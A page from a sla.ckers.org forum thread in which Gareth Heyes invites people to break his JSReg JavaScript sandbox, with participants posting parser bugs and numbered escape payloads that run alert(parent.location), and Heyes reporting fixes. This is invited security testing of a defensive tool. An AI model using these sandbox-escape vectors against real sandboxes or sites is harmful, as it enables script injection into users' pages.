Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous1234567891011...LastNext
Current Page: 6 of 13
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 06, 2010 07:57AM

@kangax

Thanks! and fixed.

There is no workaround for block statements followed by arrays though:-
{'I am a block statement'}['arrghh really an array']

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: kangax
Date: May 06, 2010 02:39PM

Another bug :)

[/x]/]; // throws Error but shouldn't

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 07, 2010 10:34AM

Fixed that one and mario's crazy regex too :-

[/[[[[[x]]]]]/]

Update...
I've put the array change live now, I may revert it back if there's a severe bug but at the moment it looks ok

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 05/08/2010 01:56PM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 14, 2010 04:49AM

I've reworked arrays and objects completely. I now use a Array translator that is scanned before the code is converted. So x=[]; gets rewritten to x=A() before it is converted further. I also removed the previous crappy loop code and created a separate for..in checker which allows the following code to work:-

o={a:1,b:2};
for(i in o)alert(i+'='+o)

Phew. Hopefully the translator should detect all arrays and closing ] correctly.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: kangax
Date: May 14, 2010 08:04AM

Looks like your $A$ — the one that's used for array creation — leaks into the rest of the user code:

function A(){ return 1 }
[A][0](); // should return 1, not throw error

Oh, and I assume experimental array support is in the main app now, right? (http://www.businessinfo.co.uk/labs/jsreg/arrays/jsreg.html seems to be gone)

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 14, 2010 08:46AM

@kangax

Yeah I dropped that method, the problem was assignments to a function call created errors. This time I parse them first so I can use leftContext to identify the previous character, I then track each open/close and assign them a counter. This makes nested arrays much easier to match.

I use $A$ as a special array constructor, it can't be a constant "A" as the main code rewrite hasn't been performed yet. I could use a higher ascii character that wouldn't affect use defined code. Any other suggestions?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: kangax
Date: May 14, 2010 08:18PM

@Gareth
I see. Well, you could always choose an identifier consisting of random characters, to lower the chance of collisions. Create it dynamically like this, for example — '$' + (Math.random() + '').slice(2)

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 09, 2010 10:11AM

Ok bumped the version up with a load of fixes and improvements

* Added Prototype support
* Constant support in IE8, Opera, Safari, Chrome, Firefox enabling me to freeze
native stuff
* Made a special token to enable static array literals
* Fixed Array literal overwrite vector

Opera is nuts it supports const x=1 but allows you to modify it! WTF.
Anyway I think most of the language is supported not except toString/valueOf on literals which I was close to supporting but <=IE7 doesn't support setters or constants so there was no 100% way of making it safe :(

I still need to optimize the code a lot and sort the comment parser and make a line by line extracting for speed. But hey I'm doing this in my spare time :) Also next up is a sandbox framework which will be similar to JQuery but in a sandboxed environment. As usual any comments or bug reports are always very welcome and the first one to break it I will get a custom Hackvertor t-shirt

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 26, 2011 04:39AM

Well, I finally found the time.

I was shocked ... I'm not going to disclose everything that I've found, because tomorrow Gareth Heyes will scream that LeverOne can't bypass JSReg. :) I don't want that.

But here's a small sample:

1.1

/lo\[/;alert(parent.location);/lo/;

Yeah, it's very difficult ... Bullshit!

LeverOne

----------------------
~Veritas~



Edited 1 time(s). Last edit at 03/28/2011 07:43AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 27, 2011 07:39AM

@LeverOne

Hehe awesome! :D thanks! Soroush also found a hole too :)

Update...
Fixed it for now but I can how more pain can be brought to me :) so I'll try and look into a more defensive fix when I have time

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/28/2011 06:53AM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 28, 2011 07:39AM

1.2

/lo\\/;alert(parent.location);/lo/;

----------------------
~Veritas~



Edited 1 time(s). Last edit at 03/28/2011 07:44AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 28, 2011 09:29AM

@LeverOne

Awesome again! Damn detecting regexes is tricky.
I've simplified the regex check, added a syntax check when matched and removed support for crazy unescaped "/" within character classes.

Thanks for beating the crap out of JSReg :) I'm worried you have a pile of these xD

BTW when I have some spare dosh I'll sort you out some prizes for this awesome work, along with the other people you broke jsreg. + a follow up blog post crediting you as well.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 03/28/2011 09:40AM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 28, 2011 10:19AM

1.3

/[/;lo="]/;alert(parent.location)//";


Quote

I'm worried you have a pile of these

Yeah, I have :)

Quote

I'll sort you out some prizes for this awesome work

It isn't necessary. I'm thinking in the future to exchange my pointless time for pointless time of yours. ;))

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 28, 2011 10:52AM

Quote

1.3

/[/;lo="]/;alert(parent.location)//";

This should be caught as the regex syntax check will be triggered. Did you shift refresh ;)

Quote

It isn't necessary. I'm thinking in the future to exchange my pointless time for pointless time of yours. ;))

That's cool :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 28, 2011 11:18AM

Quote

This should be caught as the regex syntax check will be triggered. Did you shift refresh ;)

try on Opera...

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 28, 2011 11:36AM

Quote

try on Opera...

Damn it I hate Opera

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 28, 2011 12:29PM

So now, yeah I validate opening and closing character classes manually. Hopefully closed now.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 28, 2011 12:37PM

1.4

/lo\//,/;lo=/;alert(parent.location)//;

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 28, 2011 01:08PM

@LeverOne

Ok now I check forward slashes too LOL.
Man you have more? It's almost convincing me to abandon regex as a rewriter and use char by char parsing.

Update
Damn I broke it myself hmmmmm got another fix in the pipeline

Update 2
Ok I think it's fixed, the problem was the "," is being eaten by the previous match now I use lookahead instead and look for it at the end of the string instead the beginning.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 03/28/2011 01:37PM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 28, 2011 01:46PM

1.5

lo=''/**/;alert(parent.location)//';

----------------------
~Veritas~



Edited 1 time(s). Last edit at 03/28/2011 02:43PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: SW
Date: March 29, 2011 02:14AM

/**/alert/**/(parent/**/.location/**/);

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: SW
Date: March 29, 2011 02:40AM

/*//*/alert(parent.location)//



Edited 1 time(s). Last edit at 03/29/2011 04:11AM by SW.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 29, 2011 04:48AM

@LeverOne @sw

Thanks and fixed

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 29, 2011 06:12AM

1.6

/[;
lo="]/&alert(parent.location+"");


First line should be without %20.

----------------------
~Veritas~



Edited 1 time(s). Last edit at 03/29/2011 06:41AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 29, 2011 06:28AM

:O

That's awesome! Opera is nuts!

Update
and fixed, I just removed the line rewriter since the regexes are better now it's still pretty fast

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/29/2011 07:15AM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 29, 2011 07:21AM

1.7

/lo/+/'//alert(parent.location)//';

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 29, 2011 08:05AM

@LeverOne

Fixed, I changed the regex "right" to use lookahead instead of matching characters. Man you are beating up jsreg good, any more? :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 29, 2011 08:28AM

OK, relax a while.
And yes, I have more of course. :P

----------------------
~Veritas~



Edited 1 time(s). Last edit at 03/29/2011 08:28AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 29, 2011 08:39AM

hahaha yeah that's right give me a false sense of security thanks for the break :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 30, 2011 05:42AM

1.8

/lo='/?alert(parent.location):''

----------------------
~Veritas~

Options: ReplyQuote
Pages: Previous1234567891011...LastNext
Current Page: 6 of 13


Sorry, only registered users may post in this forum.